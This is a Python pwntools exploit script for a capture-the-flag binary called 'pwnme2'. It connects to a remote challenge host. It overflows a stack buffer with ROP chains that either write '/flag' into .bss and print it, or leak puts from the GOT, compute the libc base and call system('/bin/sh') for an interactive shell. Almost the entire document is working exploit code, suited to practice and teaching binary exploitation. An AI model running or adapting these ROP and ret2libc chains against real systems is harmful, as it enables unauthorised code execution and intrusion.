from pwn import *
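#p = process('./pwnme2')
# Target selection: `python exp.py LOCAL` debugs against the local binary,
# anything else hits the remote challenge instance (`args` is exported by the
# pwntools star import above).
if args.LOCAL:
    p = process('./pwnme2')
else:
    p = remote("node3.buuoj.cn", 26522)

libc = ELF('./libc-2.23.so')   # remote libc build; only the ret2libc stage needs it
elf = ELF("./pwnme2")

# Addresses lifted from the binary.  The fixed 0x0804xxxx values only make
# sense for a non-PIE 32-bit target; they are kept as literals so the script
# does not depend on symbol names, and cross-checked against `elf` below.
plt_puts = 0x08048490
got_puts = 0x0804A028
main = 0x080486F8
plt_gets = 0x08048440
exec_string = 0x080485CB   # presumably a routine that prints the file named by the .bss string -- confirm in the disassembly
bss_string = 0x0804A060    # writable .bss buffer used as scratch space for the file path

PADDING = 108        # distance from the overflowed buffer to the saved frame pointer (from prior analysis, not derivable here)
FAKE_EBP = 0xdeadbeaf   # lands in the saved-ebp slot (the next word is the return address); never dereferenced on either chain

# Warn (do not abort) if the hard-coded addresses disagree with the ELF, so a
# swapped or rebuilt binary is noticed before a payload is fired.
for label, expected, actual in (
        ('puts@plt', plt_puts, elf.plt.get('puts')),
        ('gets@plt', plt_gets, elf.plt.get('gets')),
        ('puts@got', got_puts, elf.got.get('puts'))):
    if actual != expected:
        log.warning('%s: script has %#x, ELF says %r' % (label, expected, actual))


def _rop(*words):
    """Build the overflow payload: padding, fake saved ebp, then the chain words.

    Everything is bytes so the concatenation works under both Python 2 and 3
    (p32() returns bytes; the original mixed str and bytes).
    """
    return b'a' * PADDING + p32(FAKE_EBP) + b''.join(p32(w) for w in words)


def read_flag_via_exec_string():
    """Default stage: gets() a path into .bss, then return into exec_string.

    Chain: ret -> gets@plt, which returns into exec_string; bss_string doubles
    as gets()'s argument.  exec_string is therefore entered with bss_string in
    its return-address slot and *no* controlled argument, so this only works
    if it consumes the global at bss_string itself -- verify in the disassembly.
    """
    p.recvuntil(b'Please input:\n')
    p.sendline(_rop(plt_gets, exec_string, bss_string))
    # This line is consumed by the injected gets(): the path lands in .bss.
    # gets() stops at the newline sendline() appends, so the explicit NUL is
    # just belt-and-braces.
    p.sendline(b"/flag\x00")
    # Collect whatever the target prints (the flag, if exec_string behaves as
    # assumed) and show it -- the original read it once and then discarded it.
    out = p.recvrepeat(2)
    log.success("target output: %r" % (out,))


def ret2libc_shell():
    """Alternative stage (`python exp.py SHELL`): leak puts, then ret2libc system("/bin/sh").

    Round 1 calls puts(got_puts) and returns to main for a second overflow;
    round 2 calls system(binsh).  Requires the bundled libc to match the remote one.
    """
    p.recvuntil(b'Please input:\n')
    p.sendline(_rop(plt_puts, main, got_puts))
    # puts() prints the resolved address little-endian, up to the first NUL.
    # Anchoring on b'\xf7' assumes the usual 0xf7xxxxxx i386 libc mapping; the
    # literal must be bytes -- as a str it would be UTF-8 encoded by pwntools
    # on Python 3 and never match.  Because recvuntil only returns once that
    # high byte arrived, the slice normally already holds all four bytes and
    # the pad is a safety net rather than the common path.
    real_puts = u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
    log.success(hex(real_puts))
    libc_base = real_puts - libc.sym['puts']
    log.success(hex(libc_base))
    if libc_base & 0xfff:
        # A page-unaligned base almost always means the wrong libc build or a
        # mis-parsed leak; say so before firing the second payload.
        log.warning('libc base %#x is not page-aligned -- leak or libc mismatch?' % libc_base)
    system = libc_base + libc.sym['system']
    # next() works on both Python 2 and 3; the original's .next() is Py2-only.
    binsh = libc_base + next(libc.search(b'/bin/sh'))
    p.recvuntil(b'Please input:\n')
    p.sendline(_rop(system, main, binsh))
    p.interactive()


# Keep the original behaviour (flag-read chain) unless SHELL is requested.
if args.SHELL:
    ret2libc_shell()
else:
    read_flag_via_exec_string()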